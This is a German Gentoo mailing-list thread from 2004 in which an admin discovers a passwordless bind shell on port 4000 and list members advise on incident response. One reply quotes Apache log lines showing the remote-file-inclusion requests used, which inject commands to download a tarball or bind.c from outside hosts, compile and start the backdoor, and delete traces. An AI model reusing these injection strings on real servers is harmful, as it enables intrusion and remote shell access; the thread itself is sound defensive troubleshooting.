[gentoo-user-de] Was ist das...? (Nachtrag)

[gentoo-user-de] Was ist das...? (Nachtrag)

[Daniel Rindt]

Ich hatte ja bereits berichtet...

Dieser ./bind 4000 Prozess ist wieder da. Auch nachdem ich gestern einen
definiv sauberen Kernel eingespielt habe.
Ich habe dann mal mit telnet auf dem Port zugeriffen und wie erfreulich
öffnet sich eine shell session ohne passwort.

Aber ich habe keine Rechte dort eben nur die vom Confixxuser.
Hat jemand eine Idee? Warten bis auf dem Port eine Connection passiert?



--
gentoo-user-de@gentoo.org mailing list

Re: [gentoo-user-de] Was ist das...? (Nachtrag)

[Matthias Riesterer]

On Wednesday 22 September 2004 15:19, Daniel Rindt wrote:
> Aber ich habe keine Rechte dort eben nur die vom Confixxuser.
Deshalb lief ja wohl der Passwort-Cracker.
> Hat jemand eine Idee? Warten bis auf dem Port eine Connection passiert?
Nein, nicht warten. Vom Netz nehmen (sofort), Backup der Userdaten, 
plattmachen und neu aufsetzen und auf confixx verzichten (oder wenigstens auf 
aktuellen STand patchen).
Wenn du das nicht machst, kannst du dir nie sicher sein, daß nicht doch noch 
irgendwo ne Hintertür offen ist.

Wenn es nicht gerade nen Kiddie ist, bringt dir abwarten und Verbindungen 
zurückverfolgen eh nix, da wahrscheinlich von nem anderen kompromitierten 
Rechner zugegriffen wird.

Matthias

--
gentoo-user-de@gentoo.org mailing list

Re: [gentoo-user-de] Was ist das...? (Nachtrag)

[Arnold Krille]

[-- Attachment #1: Type: text/plain, Size: 539 bytes --]

On Wednesday 22 September 2004 15:19, Daniel Rindt wrote:
> Hat jemand eine Idee?

Wie oft wurde das schon auf der Liste geschrieben?

Den Server vom Netz nehmen, LinuxMagazin kaufen, nachlesen, welche 
Sicherheitslücken Confixx hat, wie man die nutzen kann und wie man sie fixxt. 
Und erst wenn die beschriebenen (und ein paar weitere, die Dir dann auffallen 
sollten) Schritte getan sind, geht der Server wieder ans Netz.

Und wenn eins dedi ist, kannst Du trotzdem per iptables erstmal alles außer 
ssh sperren...

Arnold

[-- Attachment #2: Type: application/pgp-signature, Size: 189 bytes --]

Re: [gentoo-user-de] Was ist das...? (Nachtrag)

[Richard Verwayen]

On Wed, 2004-09-22 at 15:19, Daniel Rindt wrote:
> Ich hatte ja bereits berichtet...
> 
> Dieser ./bind 4000 Prozess ist wieder da. Auch nachdem ich gestern einen
> definiv sauberen Kernel eingespielt habe.
> Ich habe dann mal mit telnet auf dem Port zugeriffen und wie erfreulich
> öffnet sich eine shell session ohne passwort.
> 
> Aber ich habe keine Rechte dort eben nur die vom Confixxuser.
> Hat jemand eine Idee? Warten bis auf dem Port eine Connection passiert?
Hallo Daniel,

geh mal davon aus, das du auf deinem Rechner einen ungebetenen Gast
hast, der sich dort eine Backdoor installiert hat, um immer auf sein
System zugreifen zu können. Falls du die Möglichkeit hast, empfehle ich
dir deine Daten zu sichern und das System neu aufzuspielen. 
Nach Möglichkeit solltest du daber vorher ein komplettes Image des
Systemes machen, damit du oder sie Strafverfolgungsbehörden es
untersuchen können. Schließlich ist jemand unberechtigt in dein
Computersystem, was somit als Straftat zu werten ist.

Falls du einfach abwartest, kann es sehr gut sein, das du bald keinerlei
Zugriff mehr auf den Rechner hast oder er von anderen für strafbare
Zwecke genutzt wird. 

Falls du keine besonderen Rechte auf dem Rechner beseitzt, sondern nur
einen Shell-Account, so informiere doch bitte den Besitzer/Provider über
deine Entdeckung.

Gruß Richard


--
gentoo-user-de@gentoo.org mailing list

Re: [gentoo-user-de] Was ist das...? (Nachtrag)

[Matthias Riesterer]

Bitte bleib in der Liste.

On Wednesday 22 September 2004 15:40, Daniel Rindt wrote:
> > On Wednesday 22 September 2004 15:19, Daniel Rindt wrote:
> > > Aber ich habe keine Rechte dort eben nur die vom Confixxuser.
> >
> > Deshalb lief ja wohl der Passwort-Cracker.
> >
> > > Hat jemand eine Idee? Warten bis auf dem Port eine
> >
> > Connection passiert?
> > Nein, nicht warten. Vom Netz nehmen (sofort), Backup der
> > Userdaten, plattmachen und neu aufsetzen und auf confixx
> > verzichten (oder wenigstens auf aktuellen STand patchen).
> > Wenn du das nicht machst, kannst du dir nie sicher sein, daß
> > nicht doch noch irgendwo ne Hintertür offen ist.
> >
> > Wenn es nicht gerade nen Kiddie ist, bringt dir abwarten und
> > Verbindungen zurückverfolgen eh nix, da wahrscheinlich von
> > nem anderen kompromitierten Rechner zugegriffen wird.
>
> Ich kann nicht mehr wie 100GB auf der Kiste verheizen, und bisher ist es es
> das ich Confixx echt auf dem letzten Stand habe wie gesagt ich nehme das
> sehr ernst. Bisher gibt es aber wirklich keine Anzeichen das ich neu
> aufsetzen muss.
Doch, die gibt es. Daß jemand auf deinem Rechner eingedrungen ist reicht 
völlig als Anzeichen.
Das ist bitter zu akzeptieren, ich weiß.

>
> Erklärung dazu: Ich habe local einen Kernel für dieses Gerät zusammengebaut
> diesen dann als der Rechner über das Rescue System aktiviert war
> hochgeladen und "installiert". Der BuildRechner war bis auf seine
> Installation und Kerneldownload nicht weiter im Netz. Das bedeute das Daten
> die der Kernel leifert potenziell stimmen. Die Programme zeigen bisher auch
> nichts verwerfliches an. Sicher kann man die Infos unterdrücken durch
> manipulieren.
Es hängt nicht nur am Kernel. 

>
> Von daher die Frage, würde es nicht sinn machen das System im Rescue neu zu
> kompilieren?
Nein, kompilieren reicht nicht, weil damit zusäatzlich installierte Programme 
nicht entfernt werden.

>
> Danke für Hilfe.

Also es haben doch echt genug Leute gesagt, was zu tun ist. Folge noch 
Richards Empfehlung und mach nen Image des Rechners.

Es ist bitter, aber akzeptier es einfach und lerne fürs nächste mal ;)

Matthias

--
gentoo-user-de@gentoo.org mailing list

Re: [gentoo-user-de] Was ist das...? (Nachtrag)

[Christoph Probst]

[-- Attachment #1: Type: text/plain, Size: 1410 bytes --]

Hey Daniel.

Daniel Rindt schrieb am 22.09.2004 um 15:19 Uhr:

> Dieser ./bind 4000 Prozess ist wieder da. Auch nachdem ich gestern einen
> definiv sauberen Kernel eingespielt habe.

Das hat mit Kernel und dem echten bind grad gar nichts zu tun.

Mach mal ein "ps auxww|grep bind" und gehe dann unter /proc/ in das
Verzeichnis des jeweiligen Prozesses. Da kannst Du erkennen, dass

- die Datei /var/tmp/bind heisst und automatisch geloescht wird,
  nachdem sie gestartet wurde.
- das ganze via Webserver geschieht (less environ)

Du willst ganz dringend den Webserver beenden und Dein Confixx
in Ordnung bringen - das ist meiner Meinung nach weiterhin Dein
Sicherheitsloch.

/etc/init.d/apache2 stop
rc-update del apache2 default
killall -9 bind

Bevor Du nicht diese drei Befehle eingegeben hast, erwarte
keine Verbesserung.


> Aber ich habe keine Rechte dort eben nur die vom Confixxuser.

Das nennst Du "keine Rechte"? Das ist schon verdammt viel!

> Hat jemand eine Idee? Warten bis auf dem Port eine Connection passiert?

Vergiss es. Das sind nur die Leute, die hier auf der Liste mitlesen.
Die Frage ist, wer den bind-Prozess neustartet und das siehst Du
eventuell im Webserver environment (s.o.) bzw. im apache-log.

Chris

-- 
Lots of people drink from the wrong bottle sometimes.
		-- Edith Keeler, "The City on the Edge of Forever",
		   stardate unknown

[-- Attachment #2: Type: application/pgp-signature, Size: 189 bytes --]

AW: [gentoo-user-de] Was ist das...? (Nachtrag)

[Daniel Rindt]

> 
> - die Datei /var/tmp/bind heisst und automatisch geloescht wird,
>   nachdem sie gestartet wurde.
> - das ganze via Webserver geschieht (less environ)
> 
> Du willst ganz dringend den Webserver beenden und Dein 
> Confixx in Ordnung bringen - das ist meiner Meinung nach 
> weiterhin Dein Sicherheitsloch.
> 
> /etc/init.d/apache2 stop
> rc-update del apache2 default
> killall -9 bind
> 
> Bevor Du nicht diese drei Befehle eingegeben hast, erwarte 
> keine Verbesserung.
> 
Ich habe mal im serverlog nachgeshen und voila Chris das war worann ich
nicht gedacht habe es ist eine Sicherheitslücke in einem Script von einem
Kunden :)
===
194.185.97.58 - - [25/Aug/2004:22:23:01 +0200] "GET
/visitors/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://plasture.go
.ro/&cmd=cd%20/var/tmp;wget%20ifreeoffers.com/oli/za.tgz;tar%20-xzvf%20za.tg
z;cd%20za;./zbind;./zbind;./zbind;./zbind HTTP/1.1" 200 243 "-" "Mozilla/4.0
(compatible; MSIE 5.5; Windows 98)"
80.96.71.240 - - [11/Sep/2004:22:53:46 +0200] "GET
/visitors/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://plasture.go
.ro/&cmd=cd%20/var/tmp;wget%20ifreeoffers.com/oli/za.tgz;tar%20-xzvf%20za.tg
z;cd%20za;./zbind;./zbind;./zbind;./zbind HTTP/1.1" 200 213 "-" "Mozilla/4.0
(compatible; MSIE 5.01; Windows 95)"
80.96.71.240 - - [13/Sep/2004:21:34:17 +0200] "GET
/visitors/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://plasture.go
.ro/&cmd=cd%20/var/tmp;wget%20ifreeoffers.com/oli/za.tgz;tar%20-xzvf%20za.tg
z;cd%20za;./zbind;./zbind;./zbind;./zbind HTTP/1.1" 200 211 "-" "Mozilla/4.0
(compatible; MSIE 5.01; Windows 95)"
194.226.177.88 - - [15/Sep/2004:10:51:14 +0200] "GET
/visitors/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://plasture.go
.ro/&cmd=cd /var/tmp;wget ifreeoffers.com/oli/za.tgz;tar -xzvf za.tgz;cd
za;./zbind;./zbind;./zbind;./zbind HTTP/1.0" 200 167 "-" "Lynx/2.8.1rel.2
libwww-FM/2.14"
194.185.97.58 - - [21/Sep/2004:12:04:24 +0200] "GET
/visitors/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://plasture.go
.ro/&cmd=cd%20/var/tmp;wget%20ifreeoffers.com/oli/za.tgz;tar%20-xzvf%20za.tg
z;cd%20za;./zbind;./zbind;./zbind;./zbind HTTP/1.1" 200 182 "-" "Mozilla/4.0
(compatible; MSIE 5.5; Windows 98)"
80.96.71.240 - - [21/Sep/2004:12:08:34 +0200] "GET
/visitors/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://plasture.go
.ro/&cmd=cd%20/var/tmp;wget%20ifreeoffers.com/oli/za.tgz;tar%20-xzvf%20za.tg
z;cd%20za;./zbind;./zbind;./zbind;./zbind HTTP/1.1" 200 166 "-" "Mozilla/4.0
(compatible; MSIE 5.01; Windows 95)"
80.96.71.240 - - [21/Sep/2004:13:32:06 +0200] "GET
/visitors/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://plasture.go
.ro/&cmd=cd%20/var/tmp;wget%20ifreeoffers.com/oli/za.tgz;tar%20-xzvf%20za.tg
z;cd%20za;./zbind;./zbind;./zbind;./zbind HTTP/1.1" 200 166 "-" "Mozilla/4.0
(compatible; MSIE 5.01; Windows 95)"
80.96.71.240 - - [21/Sep/2004:13:30:49 +0200] "GET
/visitors/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://plasture.go
.ro/&cmd=cd%20/var/tmp;wget%20ifreeoffers.com/oli/za.tgz;tar%20-xzvf%20za.tg
z;cd%20za;./zbind;./zbind;./zbind;./zbind HTTP/1.1" 200 166 "-" "Mozilla/4.0
(compatible; MSIE 5.01; Windows 95)"
80.96.71.240 - - [21/Sep/2004:13:34:11 +0200] "GET
/visitors/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://plasture.go
.ro/&cmd=wget%20lightb.home.ro/bind.c;ls HTTP/1.1" 200 196 "-" "Mozilla/4.0
(compatible; MSIE 5.01; Windows 95)"
80.96.71.240 - - [21/Sep/2004:13:34:30 +0200] "GET
/visitors/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://plasture.go
.ro/&cmd=gcc%20-o%20bind%20bind.c;./bind%204000& HTTP/1.1" 200 204 "-"
"Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)"
80.96.71.240 - - [21/Sep/2004:13:35:51 +0200] "GET
/visitors/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://plasture.go
.ro/&cmd=rm%20-rf%20bind*;ls HTTP/1.1" 200 189 "-" "Mozilla/4.0 (compatible;
MSIE 5.01; Windows 95)"
80.96.71.240 - - [21/Sep/2004:21:45:58 +0200] "GET
/visitors/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://plasture.go
.ro/&cmd=cd%20/var/tmp;wget%20lightb.home.ro/bind.c;gcc%20-o%20bind%20bind.c
;./bind%204000& HTTP/1.1" 200 204 "-" "Mozilla/4.0 (compatible; MSIE 5.01;
Windows 95)"
80.96.71.240 - - [22/Sep/2004:09:59:44 +0200] "GET
/visitors/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://plasture.go
.ro/&cmd=cd%20/var/tmp;wget%20lightb.home.ro/bind.c;gcc%20-o%20bind%20bind.c
;./bind%204000&;rm%20-rf%20bind%20bind.c HTTP/1.1" 200 205 "-" "Mozilla/4.0
(compatible; MSIE 5.01; Windows 95)"
===

Man Gut das ich suphp habe.
Ich gehe davon aus, das wenn dieses Teil fliegt das dann Ruhe ist.

Ich werde das mal beobachten ich habe soweit alles Dokumentiert. 


--
gentoo-user-de@gentoo.org mailing list

Re: [gentoo-user-de] Was ist das...? (Nachtrag)

[Mekonikum]

Hallo!

Es muss doch nicht unbedingt ein Confixx Fehler sein, es kann doch 
genauso gut sein das eben der Confixx User einen unsicheren Script auf 
seinem Webspace laufen hat. (PHPNuke z.B. :p).
Währe es ein Confixx Fehler müßte doch mehr betroffen sein.

cu


Arnold Krille wrote:

>On Wednesday 22 September 2004 15:19, Daniel Rindt wrote:
>  
>
>>Hat jemand eine Idee?
>>    
>>
>
>Wie oft wurde das schon auf der Liste geschrieben?
>
>Den Server vom Netz nehmen, LinuxMagazin kaufen, nachlesen, welche 
>Sicherheitslücken Confixx hat, wie man die nutzen kann und wie man sie fixxt. 
>Und erst wenn die beschriebenen (und ein paar weitere, die Dir dann auffallen 
>sollten) Schritte getan sind, geht der Server wieder ans Netz.
>
>Und wenn eins dedi ist, kannst Du trotzdem per iptables erstmal alles außer 
>ssh sperren...
>
>Arnold
>  
>


-- 

cu, Mekonikum, Serveradmin http://www.GamerNET.org

Bitte unterstützt unser stabiles, freundliches und werbungfreies IRC Netzwerk und gründet euren Channel bei uns. :-)



--
gentoo-user-de@gentoo.org mailing list